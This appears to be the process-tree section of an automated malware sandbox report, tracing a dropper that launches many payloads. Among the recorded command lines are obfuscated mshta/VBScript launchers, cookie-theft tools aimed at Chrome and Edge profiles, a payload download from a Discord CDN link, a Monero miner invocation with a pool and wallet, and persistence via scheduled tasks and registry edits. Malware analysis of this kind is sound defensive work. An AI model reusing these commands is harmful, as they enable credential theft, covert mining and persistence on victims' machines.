| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (6).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (6).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv fxGCPoqzUkqRX7Y2Kt3T4A.0.2
C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe
"C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe"
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe
"C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe"
C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe
"C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe"
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
"C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe"
C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe
"C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe"
C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe
"C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe"
C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe
"C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe"
C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe
"C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe"
C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe
"C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe"
C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe
"C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe"
C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe
"C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe"
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
"C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe"
C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe
"C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe"
C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe
"C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe"
C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe
"C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe"
C:\Users\Admin\Documents\p_hy_eIl2kbt2ySV1hwTK6x5.exe
"C:\Users\Admin\Documents\p_hy_eIl2kbt2ySV1hwTK6x5.exe"
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
"C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe"
C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe
"C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
"C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe"
C:\Users\Admin\AppData\Local\Temp\is-O602V.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O602V.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp" /SL5="$10356,138429,56832,C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe
"C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\C972.bat C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1736 -ip 1736
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Users\Admin\Documents\Gr1qBF8DD5Dpt4Vzo4DacFcs.exe
"C:\Users\Admin\Documents\Gr1qBF8DD5Dpt4Vzo4DacFcs.exe"
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe
"C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe"
C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe
"C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe"
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe
"C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1736 -s 316
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4000 -ip 4000
C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3464 -ip 3464
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe
"C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1888 -ip 1888
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3464 -s 276
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 5172 -ip 5172
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1704 -ip 1704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 5360 -ip 5360
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5172 -s 28
C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1888 -s 292
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "mUtXfmRxIl2lXYs36EcxefSC.exe" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4708 -ip 4708
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN (""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5360 -s 684
C:\Users\Admin\AppData\Roaming\8914591.exe
"C:\Users\Admin\AppData\Roaming\8914591.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\6576850.exe
"C:\Users\Admin\AppData\Roaming\6576850.exe"
C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Users\Admin\AppData\Roaming\2258295.exe
"C:\Users\Admin\AppData\Roaming\2258295.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\AppData\Roaming\6105934.exe
"C:\Users\Admin\AppData\Roaming\6105934.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ("C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\AppData\Local\Temp\is-CRUOJ.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-CRUOJ.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 1456 -ip 1456
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 276
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\17166\DES6_6_6.exe
DES6_6_6.exe
C:\Users\Admin\AppData\Local\Temp\is-P0NH0.tmp\Stats.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P0NH0.tmp\Stats.tmp" /SL5="$40302,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Users\Admin\AppData\Local\Temp\is-CSPU0.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CSPU0.tmp\Inlog.tmp" /SL5="$5022C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\is-S46A1.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S46A1.tmp\WEATHER Manager.tmp" /SL5="$1042A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-RK9I4.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RK9I4.tmp\MediaBurner2.tmp" /SL5="$10482,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\is-AQHLT.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AQHLT.tmp\VPN.tmp" /SL5="$10448,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5452 -ip 5452
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 288
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3948 -ip 3948
C:\Users\Admin\AppData\Local\Temp\is-T6J2O.tmp\ultradumnibour.exe
"C:\Users\Admin\AppData\Local\Temp\is-T6J2O.tmp\ultradumnibour.exe" /S /UID=burnerch2
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 828
C:\Users\Admin\AppData\Roaming\2435136.exe
"C:\Users\Admin\AppData\Roaming\2435136.exe"
C:\Users\Admin\AppData\Local\Temp\tmp70CC_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp70CC_tmp.exe"
C:\Users\Admin\AppData\Roaming\1938431.exe
"C:\Users\Admin\AppData\Roaming\1938431.exe"
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\AppData\Roaming\6065002.exe
"C:\Users\Admin\AppData\Roaming\6065002.exe"
C:\Users\Admin\AppData\Roaming\8350537.exe
"C:\Users\Admin\AppData\Roaming\8350537.exe"
C:\Users\Admin\AppData\Roaming\1327737.exe
"C:\Users\Admin\AppData\Roaming\1327737.exe"
C:\Users\Admin\AppData\Local\Temp\is-4U0CE.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-4U0CE.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Users\Admin\AppData\Local\Temp\is-LC5O9.tmp\builder.exe
"C:\Users\Admin\AppData\Local\Temp\is-LC5O9.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 552 -p 5300 -ip 5300
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 26CF3E2ECC50E4699D17F7E882A8043B C
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5300 -s 2412
C:\Users\Admin\AppData\Local\Temp\C247.exe
C:\Users\Admin\AppData\Local\Temp\C247.exe
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2612 -ip 2612
C:\Users\Admin\AppData\Local\Temp\is-SNUI3.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-SNUI3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Users\Admin\AppData\Local\Temp\D275.exe
C:\Users\Admin\AppData\Local\Temp\D275.exe
C:\Users\Admin\AppData\Local\Temp\is-U2RQS.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-U2RQS.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 2432
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Users\Admin\AppData\Local\Temp\is-HMBMJ.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HMBMJ.tmp\Setup.tmp" /SL5="$3063C,17345880,721408,C:\Users\Admin\AppData\Local\Temp\is-SNUI3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Users\Admin\AppData\Local\Temp\is-T1Q3M.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T1Q3M.tmp\Setup.tmp" /SL5="$1064E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-U2RQS.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 6184 -ip 6184
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 276
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\EFA2.exe
C:\Users\Admin\AppData\Local\Temp\EFA2.exe
C:\Users\Admin\AppData\Local\Temp\F272.exe
C:\Users\Admin\AppData\Local\Temp\F272.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-QP076.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C93F7E461A4FE0CD458E353576DF6DD6 C
C:\Users\Admin\AppData\Local\Temp\232.exe
C:\Users\Admin\AppData\Local\Temp\232.exe
C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe
"C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-QP076.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 53E2D7A98B698BA90F1A0E0698C518AF
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\5c436eadc6\
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-4U0CE.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-4U0CE.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 5244 -ip 5244
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 532 -p 6536 -ip 6536
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6536 -s 2412
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5244 -s 296
C:\Users\Admin\AppData\Local\Temp\1E47.exe
C:\Users\Admin\AppData\Local\Temp\1E47.exe
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\5c436eadc6\
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 1492 -ip 1492
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 280
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files\Windows Sidebar\JDVIQAUHIO\ultramediaburner.exe
"C:\Program Files\Windows Sidebar\JDVIQAUHIO\ultramediaburner.exe" /VERYSILENT
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Local\Temp\is-V6BD4.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V6BD4.tmp\ultramediaburner.tmp" /SL5="$60280,281924,62464,C:\Program Files\Windows Sidebar\JDVIQAUHIO\ultramediaburner.exe" /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\95-851b7-c53-befb3-2182a7717cd27\Refanojapae.exe
"C:\Users\Admin\AppData\Local\Temp\95-851b7-c53-befb3-2182a7717cd27\Refanojapae.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe
